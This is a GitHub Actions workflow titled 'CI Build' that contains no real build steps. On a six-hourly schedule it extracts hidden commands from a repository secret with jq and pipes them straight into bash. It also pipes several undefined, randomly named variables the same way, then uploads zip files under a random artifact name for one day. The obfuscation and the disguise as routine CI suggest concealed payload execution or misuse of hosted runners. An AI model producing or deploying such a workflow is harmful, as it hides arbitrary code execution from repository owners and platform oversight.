name: CI Build
on:
  workflow_dispatch:

  schedule:
    - cron: '36 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          r5242: ${{ secrets.r5242 }}
        run: |
          printf '%s' "$r5242" | jq -r .shbn557 | /bin/bash
          echo $mica13 | jq -r .exkaj929 | /bin/bash
          printf '%s' "$ovvwq4" | jq -r .vk0544 | /bin/bash
          printf '%s' "$hj24" | jq -r .rcs92188 | /bin/bash
          printf '%s' "$ymoz7" | jq -r .ulkbi2733 | /bin/bash
          echo $gem7617 | jq -r .aedjd36281 | /bin/bash
          echo $app37458 | jq -r .rp8182 | /bin/bash
          printf '%s' "$erp63050" | jq -r .u2965 | /bin/bash
          printf '%s' "$ccnvp7906" | jq -r .r6 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: EmzR4JAl
          path: "*.zip"
          retention-days: 1
